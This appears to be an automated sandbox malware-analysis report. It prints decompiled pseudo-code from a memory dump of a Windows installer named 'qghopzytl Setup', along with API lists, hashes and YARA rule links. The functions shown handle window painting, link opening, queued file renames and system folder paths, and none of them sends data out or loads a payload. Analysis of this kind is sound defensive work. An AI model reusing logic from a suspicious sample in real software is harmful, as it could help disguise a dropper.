						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e3fc; // 0x50be62
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42ec58; // 0x50a4d4
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42ec30; // 0x504d60
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}




















              0x00403fdb
              0x00404101
              0x0040415d
              0x00404161
              0x00404238
              0x0040423a
              0x0040423a
              0x00404240
              0x00404240
              0x00404243
              0x00000000
              0x0040424a
              0x0040416f
              0x00404171
              0x0040417b
              0x00404186
              0x00404189
              0x0040418c
              0x00404197
              0x0040419a
              0x004041a1
              0x004041af
              0x004041c7
              0x004041da
              0x004041ea
              0x004041ec
              0x004041ec
              0x004041a1
              0x004041f6
              0x00000000
              0x00404201
              0x00404205
              0x00404216
              0x00404216
              0x0040421c
              0x0040422a
              0x0040422a
              0x00000000
              0x0040422e
              0x004041f6
              0x0040410c
              0x00000000
              0x00404120
              0x00404126
              0x0040412c
              0x00000000
              0x00000000
              0x00404151
              0x00404153
              0x00404158
              0x00000000
              0x00404158
              0x0040410c
              0x00403fe1
              0x00403fe4
              0x00403fe9
              0x00403feb
              0x00403ffa
              0x00403ffa
              0x00403ffc
              0x00404001
              0x00404004
              0x00404006
              0x0040400b
              0x00404014
              0x0040401a
              0x00404026
              0x00404029
              0x00404032
              0x00404037
              0x0040403a
              0x0040403f
              0x00404056
              0x0040405d
              0x00404070
              0x00404073
              0x00404088
              0x0040408a
              0x0040408f
              0x00404094
              0x00404099
              0x00404099
              0x004040a8
              0x004040b7
              0x004040b9
              0x004040cf
              0x004040de
              0x004040e0
              0x00000000

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
              • String ID: N$TclpOwkq$`MP$open
              • API String ID: 3615053054-2787215503
              • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
              • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
              • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
              • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401000, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 125COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30; // 0x504d60
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "qghopzytl Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42ec28; // 0x50370
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














              0x0040100a
              0x00401039
              0x00401047
              0x0040104d
              0x00401051
              0x0040105b
              0x00401061
              0x00401064
              0x004010f3
              0x00401089
              0x0040108c
              0x004010a6
              0x004010bd
              0x004010cc
              0x004010cf
              0x004010d5
              0x004010d9
              0x004010e4
              0x004010ed
              0x004010ef
              0x004010ef
              0x00401100
              0x00401105
              0x0040110d
              0x00401110
              0x00401112
              0x00401118
              0x0040111f
              0x00401126
              0x00401130
              0x00401142
              0x00401156
              0x00401160
              0x00401165
              0x00401165
              0x00401110
              0x0040116e
              0x00000000
              0x00401178
              0x00401010
              0x00401013
              0x00401015
              0x00401019
              0x0040101f
              0x0040101f
              0x00000000

              APIs
              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectA.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,?), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextA.USER32(00000000,qghopzytl Setup,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F$`MP$qghopzytl Setup
              • API String ID: 941294808-3874227717
              • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
              • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
              • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
              • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405915, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t18 =  *0x42ec30; // 0x504d60
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















              0x0040591b
              0x00405922
              0x00405926
              0x0040592f
              0x00405933
              0x00405a72
              0x00405a72
              0x00000000
              0x00405a72
              0x00405933
              0x0040593f
              0x00405955
              0x0040597d
              0x00405988
              0x0040598c
              0x004059ac
              0x004059ae
              0x004059b3
              0x004059bd
              0x004059ca
              0x004059cf
              0x004059d4
              0x004059d8
              0x00000000
              0x00000000
              0x004059e7
              0x004059e9
              0x004059f6
              0x004059fa
              0x00405a6b
              0x00405a6c
              0x00000000
              0x00405a16
              0x00405a23
              0x00405a88
              0x00405a8f
              0x00405a36
              0x00405a36
              0x00405a38
              0x00405a41
              0x00405a4c
              0x00405a5e
              0x00405a65
              0x00000000
              0x00405a65
              0x00405a91
              0x00405a92
              0x00405a97
              0x00405a99
              0x00405aa6
              0x00405aa6
              0x00405aaa
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405a9b
              0x00405a9b
              0x00405a9e
              0x00405aa1
              0x00405aa2
              0x00000000
              0x00405a9b
              0x00405a2e
              0x00405a33
              0x00000000
              0x00405a33
              0x004059fa
              0x00405957
              0x00405962
              0x0040596b
              0x0040596f
              0x00000000
              0x00000000
              0x0040596f
              0x00405a7c

              APIs
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • CloseHandle.KERNEL32(00000000), ref: 00405962
              • GetShortPathNameA.KERNEL32 ref: 0040596B
              • GetShortPathNameA.KERNEL32 ref: 00405988
              • wsprintfA.USER32 ref: 004059A6
              • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405A06
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A5E
              • GlobalFree.KERNEL32(00000000), ref: 00405A65
              • CloseHandle.KERNEL32(00000000), ref: 00405A6C
                • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
              • String ID: %s=%s$[Rename]$`MP
              • API String ID: 3445103937-4000334578
              • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
              • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
              • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
              • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405BE9, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42e3fc; // 0x50be62
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x42ec58; // 0x50a4d4
				_t74 = _t73 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24; // 0x74951528
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}






























              0x00405be9
              0x00405be9
              0x00405be9
              0x00405bef
              0x00405bf4
              0x00405bf6
              0x00405c05
              0x00405c05
              0x00405c07
              0x00405c10
              0x00405c12
              0x00405c17
              0x00405c1a
              0x00405c1b
              0x00405c22
              0x00405c24
              0x00405c2a
              0x00405c2d
              0x00405c2d
              0x00405e06
              0x00405e06
              0x00405e0a
              0x00000000
              0x00000000
              0x00405c3a
              0x00405c40
              0x00000000
              0x00000000
              0x00405c46
              0x00405c47
              0x00405c4a
              0x00405c4d
              0x00405df9
              0x00405e03
              0x00405e05
              0x00405e05
              0x00405dfb
              0x00405dfd
              0x00405dff
              0x00405e00
              0x00405e00
              0x00000000
              0x00405df9
              0x00405c53
              0x00405c57
              0x00405c67
              0x00405c6b
              0x00405c72
              0x00405c75
              0x00405c79
              0x00405c7f
              0x00405c82
              0x00405c85
              0x00405c88
              0x00405da3
              0x00405da6
              0x00405dd6
              0x00405dd9
              0x00405dde
              0x00405de2
              0x00405de2
              0x00405de7
              0x00405de8
              0x00405ded
              0x00405df0
              0x00405df2
              0x00000000
              0x00405df2
              0x00405da8
              0x00405dab
              0x00405dc0
              0x00405dc7
              0x00405dad
              0x00405db4
              0x00405db4
              0x00405dcf
              0x00405dd2
              0x00405d9b
              0x00405d9c
              0x00405d9c
              0x00000000
              0x00405dd2
              0x00405c90
              0x00405c91
              0x00405c97
              0x00405c99
              0x00405cb3
              0x00405cb3
              0x00405cba
              0x00405cba
              0x00405cc1
              0x00405cc5
              0x00405cc5
              0x00405cc6
              0x00405cc8
              0x00405d01
              0x00405d04
              0x00405d14
              0x00405d17
              0x00405d1f
              0x00405d25
              0x00405d25
              0x00405d81
              0x00405d81
              0x00405d83
              0x00000000
              0x00000000
              0x00405d29
              0x00405d30
              0x00405d31
              0x00405d33
              0x00405d4d
              0x00405d5b
              0x00405d61
              0x00405d63
              0x00405d7e
              0x00405d7e
              0x00405d7e
              0x00000000
              0x00405d7e
              0x00405d69
              0x00405d74
              0x00405d7a
              0x00405d7c
              0x00000000
              0x00000000
              0x00000000
              0x00405d7c
              0x00405d35
              0x00405d38
              0x00000000
              0x00000000
              0x00405d47
              0x00405d49
              0x00405d4b
              0x00000000
              0x00000000
              0x00000000
              0x00405d4b
              0x00000000
              0x00405d81
              0x00405d0c
              0x00000000
              0x00405cca
              0x00405ccf
              0x00405ce5
              0x00405cea
              0x00405ced
              0x00405d8a
              0x00405d8a
              0x00405d8e
              0x00405d96
              0x00405d96
              0x00000000
              0x00405d8e
              0x00405cf7
              0x00405d85
              0x00405d85
              0x00405d88
              0x00000000
              0x00000000
              0x00000000
              0x00405d88
              0x00405cc8
              0x00405c9b
              0x00405c9f
              0x00000000
              0x00000000
              0x00405ca1
              0x00405ca5
              0x00000000
              0x00000000
              0x00405ca7
              0x00405cab
              0x00000000
              0x00405cad
              0x00405cad
              0x00000000
              0x00405cad
              0x00405cab
              0x00405e10
              0x00405e1a
              0x00405e26
              0x00405e26
              0x00000000

              APIs
              • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
              • GetSystemDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D0C
              • GetWindowsDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D1F
              • SHGetSpecialFolderLocation.SHELL32(?,0041A276), ref: 00405D5B
              • SHGetPathFromIDListA.SHELL32(0041A276,TclpOwkq), ref: 00405D69
              • CoTaskMemFree.OLE32(0041A276), ref: 00405D74
              • lstrcatA.KERNEL32(TclpOwkq,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
              • lstrlenA.KERNEL32(TclpOwkq,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
              • String ID: Software\Microsoft\Windows\CurrentVersion$TclpOwkq$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 900638850-487370903
              • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
              • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
              • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
              • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








              0x00405e2b
              0x00405e33
              0x00405e47
              0x00405e47
              0x00405e4d
